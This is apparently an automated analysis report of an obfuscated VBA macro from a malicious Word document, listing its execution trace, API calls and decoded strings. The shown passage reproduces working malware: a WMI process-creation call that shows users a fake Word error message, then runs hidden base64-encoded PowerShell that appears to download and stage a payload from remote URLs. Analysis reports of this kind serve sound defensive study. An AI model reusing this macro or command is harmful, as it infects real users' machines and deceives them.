197	Op0zef7hsi0prtkn4 = Mid(mn2b, (5), Len(mn2b))	Mid Len("\x01 J)(3s2)(J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(/J)(3s2)(cJ)(3s2)( J)(3s2)(mJ)(3s2)(sJ)(3s2)(gJ)(3s2)( J)(3s2)(%J)(3s2)(uJ)(3s2)(sJ)(3s2)(eJ)(3s2)(rJ)(3s2)(nJ)(3s2)(aJ)(3s2)(mJ)(3s2)(eJ)(3s2)(%J)(3s2)( J)(3s2)(/J)(3s2)(vJ)(3s2)( J)(3s2)(WJ)(3s2)(oJ)(3s2)(rJ)(3s2)(dJ)(3s2)( J)(3s2)(eJ)(3s2)(xJ)(3s2)(pJ)(3s2)(eJ)(3s2)(rJ)(3s2)(iJ)(3s2)(eJ)(3s2)(nJ)(3s2)(cJ)(3s2)(eJ)(3s2)(dJ)(3s2)( J)(3s2)(aJ)(3s2)(nJ)(3s2)( J)(3s2)(eJ)(3s2)(rJ)(3s2)(rJ)(3s2)(oJ)(3s2)(rJ)(3s2)( J)(3s2)(tJ)(3s2)(rJ)(3s2)(yJ)(3s2)(iJ)(3s2)(nJ)(3s2)(gJ)(3s2)( J)(3s2)(tJ)(3s2)(oJ)(3s2)( J)(3s2)(oJ)(3s2)(pJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(tJ)(3s2)(hJ)(3s2)(eJ)(3s2)( J)(3s2)(fJ)(3s2)(iJ)(3s2)(lJ)(3s2)(eJ)(3s2)(.J)(3s2)( J)(3s2)(&J)(3s2)( J)(3s2)( J)(3s2)(PJ)(3s2)(OJ)(3s2)(wJ)(3s2)(eJ)(3s2)(rJ)(3s2)(sJ)(3s2)(hJ)(3s2)(eJ)(3s2)(LJ)(3s2)(LJ)(3s2)( J)(3s2)(-J)(3s2)(wJ)(3s2)( J)(3s2)(hJ)(3s2)(iJ)(3s2)(dJ)(3s2)(dJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(-J)(3s2)(EJ)(3s2)(NJ)(3s2)(CJ)(3s2)(OJ)(3s2)(DJ)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( IAJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(MgJ)(3s2)(BPJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(WQJ)(3s2)(BqJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(IAJ)(3s2)(A9J)(3s2)(ACJ)(3s2)(AAJ)(3s2)(WwJ)(3s2)(B0J)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UAJ)(3s2)(BlJ)(3s2)(AFJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AiJ)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MgJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MAJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MwJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MQJ)(3s2)(B9J)(3s2)(ACJ)(3s2)(IAJ)(3s2)(IAJ)(3s2)(AtJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(IAJ)(3s2)(AnJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UwJ)(3s2)(B0J)(3s2)(AGJ)(3s2)(UAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(RAJ)(3s2)(BJJ)(3s2)(AHJ)(3s2)(IAJ)(3s2)(ZQJ)(3s2)(BjJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bwJ)(3s2)(ByJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BNJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(SQJ)(3s2)(BPJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ADJ)(3s2)(sAJ)(3s2)(IAJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(AwJ)(3s2)(AFJ)(3s2)(MAJ)(3s2)(SAJ)(3s2)(AxJ)(3s2)(AGJ)(3s2)(cAJ)(3s2)(MwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(PQJ)(3s2)(AgJ)(3s2)(AFJ)(3s2)(sAJ)(3s2)(VAJ)(3s2)(BZJ)(3s2)(AHJ)(3s2)(AAJ)(3s2)(RQJ)(3s2)(BdJ)(3s2)(ACJ)(3s2)(gAJ)(3s2)(IgJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(MAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(AAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(IAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(EAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(QAJ)(3s2)(fQJ)(3s2)(AiJ)(3s2)(ACJ)(3s2)(0AJ)(3s2)(RgJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(UAJ)(3s2)(VAJ)(3s2)(AuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(MAJ)(3s2)(RQJ)(3s2)(BwJ)(3s2)(AEJ)(3s2)(8AJ)(3s2)(SQJ)(3s2)(BuJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BzJ)(3s2)(AGJ)(3s2)(UAJ)(3s2)(cgJ)(3s2)(BWJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(B5J)(3s2)(AHJ)(3s2)(MAJ)(3s2)(dAJ)(3s2)(BlJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(LgJ)(3s2)(BuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(EAJ)(3s2)(TgJ)(3s2)(BhJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZQJ)(3s2)(BSJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(OwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(BXJ)(3s2)(AHJ)(3s2)(UAJ)(3s2)(bAJ)(3s2)(B3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dwJ)(3s2)(BkJ)(3s2)(ADJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AoJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(VQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(BmJ)(3s2)(AGJ)(3s2)(EAJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(KAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(8AJ)(3s2)(cAJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(B2J)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(ArJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(kAJ)(3s2)(OwJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(MAJ)(3s2)(NgJ)(3s2)(A3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dgJ)(3s2)(BwJ)(3s2)(AFJ)(3s2)(8AJ)(3s2)(PQJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZwJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(gAJ)(3s2)(MgJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(IAJ)(3s2)(ArJ)(3s2)(ACJ)(3s2) -> 39020 executed
198	Goto bKRLCqR
199	Dim IyiwBHG as String
200	Open "WdQWH.qAFZlDnI.EPZlJJDnD" For Binary As 198	Open
201	Put # 198, , IyiwBHG
202	Close # 198
202	bKRLCqR:
204	Goto shBWyQG
205	Dim tJBtVVy as String
206	Open "ihoEED.PDrskFBA.bJbNF" For Binary As 230	Open
207	Put # 230, , tJBtVVy
208	Close # 230
208	shBWyQG:
210	Goto fgHICJHJ
211	Dim NfmoCHe as String
212	Open "ugVrJFm.YuthuIJ.ckCqK" For Binary As 210	Open
213	Put # 210, , NfmoCHe
214	Close # 210
214	fgHICJHJ:
216	Goto rNlIgDGG
217	Dim kQkqMq as String
218	Open "zZudKI.oKzyJHE.mICJqCLW" For Binary As 82	Open
219	Put # 82, , kQkqMq
220	Close # 82
220	rNlIgDGG:
222	Goto MacHEivy
223	Dim UYDdxBQA as String
224	Open "gDQhOr.AdtYHAyCC.QdPVFH" For Binary As 167	Open
225	Put # 167, , UYDdxBQA
226	Close # 167
226	MacHEivy:
228	Goto psnrIHICY
229	Dim jCzixXAB as String
230	Open "IqlrqA.vtwEIm.lETEIJA" For Binary As 95	Open
231	Put # 95, , jCzixXAB
232	Close # 95
232	psnrIHICY:
234	Che810bmyytv7es3.Create Lala28ia3bsrs_njr8(Op0zef7hsi0prtkn4), Ud9_lppkb568bn7, Tt2eddizxwvf	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIA,,) -> 0 Ud9_lppkb568bn7 Tt2eddizxwvf executed
235	Goto QuDJB
236	Dim natkhGFQD as String
237	Open "GBOjolD.psdHCIh.HuOuBFiwJ" For Binary As 178	Open
238	Put # 178, , natkhGFQD
239	Close # 178
239	QuDJB:
241	Goto ftFiaG
242	Dim iAPcH as String
243	Open "wWbKMTCsB.TfYnablxs.EKZtUghe" For Binary As 78	Open
244	Put # 78, , iAPcH
245	Close # 78
245	ftFiaG:
247	Goto dkidmfe
248	Dim lBpiLIQXL as String
249	Open "wLTBZpoB.cMFiJ.phmHGHlJI" For Binary As 116	Open
250	Put # 116, , lBpiLIQXL
251	Close # 116
251	dkidmfe:
253	Goto rLjMqJC
254	Dim BcjsHnEg as String
255	Open "jyHqihfKA.HgOuAh.cuXjB" For Binary As 109	Open
256	Put # 109, , BcjsHnEg
257	Close # 109
257	rLjMqJC:
259	Goto IYLpCJ
260	Dim szYhABIf as String
261	Open "eRlbAHDf.VXIsV.yVVaFD" For Binary As 100	Open
262	Put # 100, , szYhABIf
263	Close # 100
263	IYLpCJ:
265	Goto RmtjCU
266	Dim WMQzHDM as String
267	Open "IhtjJG.WtfQBcbC.TNiPT" For Binary As 188	Open
268	Put # 188, , WMQzHDM
269	Close # 188
269	RmtjCU:
271	End Function

Function Lala28ia3bsrs_njr8, APIs: 20, Strings: 12, Number of lines: 78, Relevance: 48.078

APIs	Meta Information
Open
Open
Open
Open
Open
Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Replace
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Dxkc08p3mbht
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Part of subcall function Oyfrd5_ht_rhw@Qfepbztq9r8o1l76: Open
Open
Open
Open
Open
Open
Open

Strings	Decrypted Strings
"DhFqOHHFH.LWgNFDF.xxbwQDD"
"FRqFHc.GehTAIFeH.hjCZI"
"SIYsHYJ.szjuc.RoiPd"
"PJdCYHGDx.xMcac.TuKMx"
"ZgugNT.fyNMD.sGSsb"
"fQjsm.gYjzDADu.uLEQDCB"
"jDyAHIGsG.AovRB.OpXLjg"
"LVNMDIBAF.xsRQCZg.LUmCCICh"
"PuasnADG.cAXTGAN.sUXKFmjG"
"TtYIGDY.tYlIB.IXupzJHD"
"DlzhGE.NKfSJqpcH.SjmcJJBJJ"
"RatqHEg.BQzvFHj.DPRWAZfCV"

Line	Instruction	Meta Information
272	Function Lala28ia3bsrs_njr8(Orlzdb51qrb9)
273	On Error Resume Next	executed
274	Goto rHCZjEw
275	Dim slPRBMFEB as String
276	Open "DhFqOHHFH.LWgNFDF.xxbwQDD" For Binary As 101	Open
277	Put # 101, , slPRBMFEB
278	Close # 101
278	rHCZjEw:
280	Goto daVOIQkE
281	Dim uhOGZf as String
282	Open "FRqFHc.GehTAIFeH.hjCZI" For Binary As 186	Open
283	Put # 186, , uhOGZf
284	Close # 186
284	daVOIQkE:
286	Goto tbIDBxAIB
287	Dim QokjF as String
288	Open "SIYsHYJ.szjuc.RoiPd" For Binary As 60	Open
289	Put # 60, , QokjF
290	Close # 60
290	tbIDBxAIB:
292	Xyzanni2197 = (Orlzdb51qrb9)
293	Goto kSctB
294	Dim dOVxshsCI as String
295	Open "PJdCYHGDx.xMcac.TuKMx" For Binary As 163	Open
296	Put # 163, , dOVxshsCI
297	Close # 163
297	kSctB:
299	Goto hDtiCc
300	Dim kloRF as String
301	Open "ZgugNT.fyNMD.sGSsb" For Binary As 138	Open
302	Put # 138, , kloRF
303	Close # 138
303	hDtiCc:
305	Goto qarxACNqv
306	Dim OGQTPEH as String
307	Open "fQjsm.gYjzDADu.uLEQDCB" For Binary As 140	Open
308	Put # 140, , OGQTPEH
309	Close # 140
309	qarxACNqv:
311	Vfop753cj7535cxqmw = Oyfrd5_ht_rhw(Xyzanni2197)
312	Goto jvyTJ
313	Dim xISbD as String
314	Open "jDyAHIGsG.AovRB.OpXLjg" For Binary As 219	Open
315	Put # 219, , xISbD
316	Close # 219
316	jvyTJ:
318	Goto xJNGw
319	Dim aMkVd as String
320	Open "LVNMDIBAF.xsRQCZg.LUmCCICh" For Binary As 202	Open
321	Put # 202, , aMkVd
322	Close # 202
322	xJNGw:
324	Goto oSyUH
325	Dim pIPwEU as String
326	Open "PuasnADG.cAXTGAN.sUXKFmjG" For Binary As 197	Open
327	Put # 197, , pIPwEU
328	Close # 197
328	oSyUH:
330	Lala28ia3bsrs_njr8 = Vfop753cj7535cxqmw
331	Goto FMrcDEFEQ
332	Dim RGWBBRDVD as String
333	Open "TtYIGDY.tYlIB.IXupzJHD" For Binary As 129	Open
334	Put # 129, , RGWBBRDVD
335	Close # 129
335	FMrcDEFEQ:
337	Goto yYtBFhh
338	Dim LeiBYFBA as String
339	Open "DlzhGE.NKfSJqpcH.SjmcJJBJJ" For Binary As 73	Open
340	Put # 73, , LeiBYFBA
341	Close # 73
341	yYtBFhh:
343	Goto rrzVQC
344	Dim UMafav as String
345	Open "RatqHEg.BQzvFHj.DPRWAZfCV" For Binary As 110	Open
346	Put # 110, , UMafav
347	Close # 110
347	rrzVQC:
349	End Function

Function Oyfrd5_ht_rhw, APIs: 8, Strings: 7, Number of lines: 39, Relevance: 31.539

APIs	Meta Information
Open
Open
Open
Replace	Replace("wJ)(3s2)(inJ)(3s2)(mJ)(3s2)(gmJ)(3s2)(tJ)(3s2)(J)(3s2)(SJ)(3s2)(:wJ)(3s2)(J)(3s2)(inJ)(3s2)(3J)(3s2)(2J)(3s2)(_J)(3s2)(J)(3s2)(pJ)(3s2)(J)(3s2)(roJ)(3s2)(J)(3s2)(ceJ)(3s2)(sJ)(3s2)(sJ)(3s2)(J)(3s2)(","J)(3s2)(",) -> winmgmtS:win32_process Replace("J)(3s2)(J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(cJ)(3s2)(mJ)(3s2)(dJ)(3s2)( J)(3s2)(/J)(3s2)(cJ)(3s2)( J)(3s2)(mJ)(3s2)(sJ)(3s2)(gJ)(3s2)( J)(3s2)(%J)(3s2)(uJ)(3s2)(sJ)(3s2)(eJ)(3s2)(rJ)(3s2)(nJ)(3s2)(aJ)(3s2)(mJ)(3s2)(eJ)(3s2)(%J)(3s2)( J)(3s2)(/J)(3s2)(vJ)(3s2)( J)(3s2)(WJ)(3s2)(oJ)(3s2)(rJ)(3s2)(dJ)(3s2)( J)(3s2)(eJ)(3s2)(xJ)(3s2)(pJ)(3s2)(eJ)(3s2)(rJ)(3s2)(iJ)(3s2)(eJ)(3s2)(nJ)(3s2)(cJ)(3s2)(eJ)(3s2)(dJ)(3s2)( J)(3s2)(aJ)(3s2)(nJ)(3s2)( J)(3s2)(eJ)(3s2)(rJ)(3s2)(rJ)(3s2)(oJ)(3s2)(rJ)(3s2)( J)(3s2)(tJ)(3s2)(rJ)(3s2)(yJ)(3s2)(iJ)(3s2)(nJ)(3s2)(gJ)(3s2)( J)(3s2)(tJ)(3s2)(oJ)(3s2)( J)(3s2)(oJ)(3s2)(pJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(tJ)(3s2)(hJ)(3s2)(eJ)(3s2)( J)(3s2)(fJ)(3s2)(iJ)(3s2)(lJ)(3s2)(eJ)(3s2)(.J)(3s2)( J)(3s2)(&J)(3s2)( J)(3s2)( J)(3s2)(PJ)(3s2)(OJ)(3s2)(wJ)(3s2)(eJ)(3s2)(rJ)(3s2)(sJ)(3s2)(hJ)(3s2)(eJ)(3s2)(LJ)(3s2)(LJ)(3s2)( J)(3s2)(-J)(3s2)(wJ)(3s2)( J)(3s2)(hJ)(3s2)(iJ)(3s2)(dJ)(3s2)(dJ)(3s2)(eJ)(3s2)(nJ)(3s2)( J)(3s2)(-J)(3s2)(EJ)(3s2)(NJ)(3s2)(CJ)(3s2)(OJ)(3s2)(DJ)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( J)(3s2)( IAJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(MgJ)(3s2)(BPJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(WQJ)(3s2)(BqJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(IAJ)(3s2)(A9J)(3s2)(ACJ)(3s2)(AAJ)(3s2)(WwJ)(3s2)(B0J)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UAJ)(3s2)(BlJ)(3s2)(AFJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AiJ)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MgJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MAJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MwJ)(3s2)(B9J)(3s2)(AHJ)(3s2)(sAJ)(3s2)(MQJ)(3s2)(B9J)(3s2)(ACJ)(3s2)(IAJ)(3s2)(IAJ)(3s2)(AtJ)(3s2)(AEJ)(3s2)(YAJ)(3s2)(IAJ)(3s2)(AnJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(UwJ)(3s2)(B0J)(3s2)(AGJ)(3s2)(UAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(RAJ)(3s2)(BJJ)(3s2)(AHJ)(3s2)(IAJ)(3s2)(ZQJ)(3s2)(BjJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bwJ)(3s2)(ByJ)(3s2)(AFJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BNJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(SQJ)(3s2)(BPJ)(3s2)(ACJ)(3s2)(4AJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ADJ)(3s2)(sAJ)(3s2)(IAJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(AwJ)(3s2)(AFJ)(3s2)(MAJ)(3s2)(SAJ)(3s2)(AxJ)(3s2)(AGJ)(3s2)(cAJ)(3s2)(MwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(PQJ)(3s2)(AgJ)(3s2)(AFJ)(3s2)(sAJ)(3s2)(VAJ)(3s2)(BZJ)(3s2)(AHJ)(3s2)(AAJ)(3s2)(RQJ)(3s2)(BdJ)(3s2)(ACJ)(3s2)(gAJ)(3s2)(IgJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(MAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(AAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(IAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(EAJ)(3s2)(fQJ)(3s2)(B7J)(3s2)(ADJ)(3s2)(QAJ)(3s2)(fQJ)(3s2)(AiJ)(3s2)(ACJ)(3s2)(0AJ)(3s2)(RgJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(UAJ)(3s2)(VAJ)(3s2)(AuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(MAJ)(3s2)(RQJ)(3s2)(BwJ)(3s2)(AEJ)(3s2)(8AJ)(3s2)(SQJ)(3s2)(BuJ)(3s2)(AFJ)(3s2)(QAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(wAJ)(3s2)(JwJ)(3s2)(BzJ)(3s2)(AGJ)(3s2)(UAJ)(3s2)(cgJ)(3s